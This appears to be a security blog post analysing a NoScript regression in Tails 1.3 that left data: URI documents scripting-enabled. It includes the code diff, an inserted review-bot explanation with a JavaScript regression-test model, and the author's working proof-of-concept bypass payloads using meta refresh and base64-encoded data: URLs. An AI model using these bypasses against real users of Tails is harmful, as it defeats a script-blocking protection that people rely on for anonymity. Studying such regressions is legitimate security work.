A couple of days ago, the Tails devs discovered that they had missed a NoScript update for Tails 1.3 by a couple of hours. It fixes an interesting regression:
v 2.6.9.15
- Fixed regression in 2.6.9.12 causing data: URI documents to be scripting-enabled (thanks GOF for tweet)
I know that Giorgio has some semi-private PoCs, but they don't work that well in Tails, so I thought I'd give it a try.
This is the relevant excerpt of the diff, with site indicating a normal URL and !site a special one, like a data: URL:
- blockIt = !site || (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
+ blockIt = site && (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
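Review bot: the rewrite of `blockIt` is not equivalent to the original for the special-URL case, and that is the regression. With `!site` (a data: document), the old `!site || (...)` short-circuits to `true` and blocks scripting; the new `site && (...)` short-circuits to `false` (actually to the falsy `site` value) and allows it, which matches the 2.6.9.15 changelog entry "data: URI documents to be scripting-enabled". For normal sites both forms reduce to the same inner ternary, so the flip only shows up for special documents. Keep `!site ||` as the leading term (or an explicit early `if (!site) { blockIt = true; }`), and add a test that passes a null/special site through both the CAPS and non-CAPS branches so this kind of boolean flip is caught before release.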
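To make the flip concrete, here is an added example (not NoScript's own code, and not the diff above) that models the two `blockIt` expressions as functions and walks every combination of the `usingCAPS` / `restrictSubdocScripting` flags over a few sample sites. `makePolicy`, the sample site names, and the representation of a special document as `site === null` are assumptions of this example; the point is the regression test at the bottom, which the "-" line passes and the "+" line fails.

```javascript
// Added example (not NoScript's code): a minimal model of the blockIt
// decision from the diff, plus the regression test that would have caught
// the flip for special (data:) documents.
//
// Assumptions: `site` is a string for normal URLs and null for special
// documents such as data: URIs; usingCAPS / restrictSubdocScripting,
// isUntrusted() and isJSEnabled() are modelled by a small policy object.

function makePolicy({ usingCAPS, restrictSubdocScripting, untrusted, jsEnabled }) {
  return {
    usingCAPS,
    restrictSubdocScripting,
    isUntrusted: (site) => untrusted.has(site),
    isJSEnabled: (site) => jsEnabled.has(site),
  };
}

// Original expression (the "-" line): a special document is always blocked.
function blockItBefore(p, site) {
  return !site || (p.usingCAPS && !p.restrictSubdocScripting ? p.isUntrusted(site) : !p.isJSEnabled(site));
}

// Regressed expression (the "+" line): a special document is never blocked.
function blockItAfter(p, site) {
  return site && (p.usingCAPS && !p.restrictSubdocScripting ? p.isUntrusted(site) : !p.isJSEnabled(site));
}

// Enumerate both flags and three representative sites (constructed sample
// values) and return every case where the two expressions disagree.
function findDivergentCases() {
  const sites = ["https://trusted.example", "https://untrusted.example", null];
  const divergent = [];
  for (const usingCAPS of [false, true]) {
    for (const restrictSubdocScripting of [false, true]) {
      const p = makePolicy({
        usingCAPS,
        restrictSubdocScripting,
        untrusted: new Set(["https://untrusted.example"]),
        jsEnabled: new Set(["https://trusted.example"]),
      });
      for (const site of sites) {
        const before = Boolean(blockItBefore(p, site));
        const after = Boolean(blockItAfter(p, site));
        if (before !== after) {
          divergent.push({ usingCAPS, restrictSubdocScripting, site, before, after });
        }
      }
    }
  }
  return divergent;
}

// The regression test: a special (null) site must be blocked under every
// combination of the two flags, whatever the trust tables say.
function specialDocumentsAlwaysBlocked(blockIt) {
  for (const usingCAPS of [false, true]) {
    for (const restrictSubdocScripting of [false, true]) {
      const p = makePolicy({ usingCAPS, restrictSubdocScripting, untrusted: new Set(), jsEnabled: new Set() });
      if (!blockIt(p, null)) return false;
    }
  }
  return true;
}

// Stand-alone run: lists the four divergent cases, all with site === null.
console.log(findDivergentCases());
console.log("before:", specialDocumentsAlwaysBlocked(blockItBefore), "after:", specialDocumentsAlwaysBlocked(blockItAfter));
```

The divergence list contains only the `null` site, once per flag combination, with `before: true` and `after: false`; for the two normal sites both expressions agree on every branch, which is why an ordinary allow/deny test suite would not have noticed the change.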
At first, I was thinking about using the classic thing:
<a target=_blank href="data:text/html,<script>alert(1)</script>">clic</a>
But it seems that you need to refresh the page to trigger the JavaScript.
<a target=_blank href="data:text/html,<META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">clic</a>
This is working! Time to improve it: why not use refresh twice? Once to load our payload, and once more to trigger it.
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html, <META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">
Yay!
If you're lazy clever, you could of course use the HTTP Location header instead; it'll work too.
And since the data: URL scheme supports base64, you can encode your payload for even more l33tness:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PE1FVEEgSFRUUC1FUVVJVj0ncmVmcmVzaCcgQ09OVEVOVD0nMCc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=">
Hurray, you can now run your JavaScript-powered 0-days in script-forbidden Tails!
Edit: as Giorgio said, this regression isn't that interesting, since such a data: document is considered cross-domain to everything.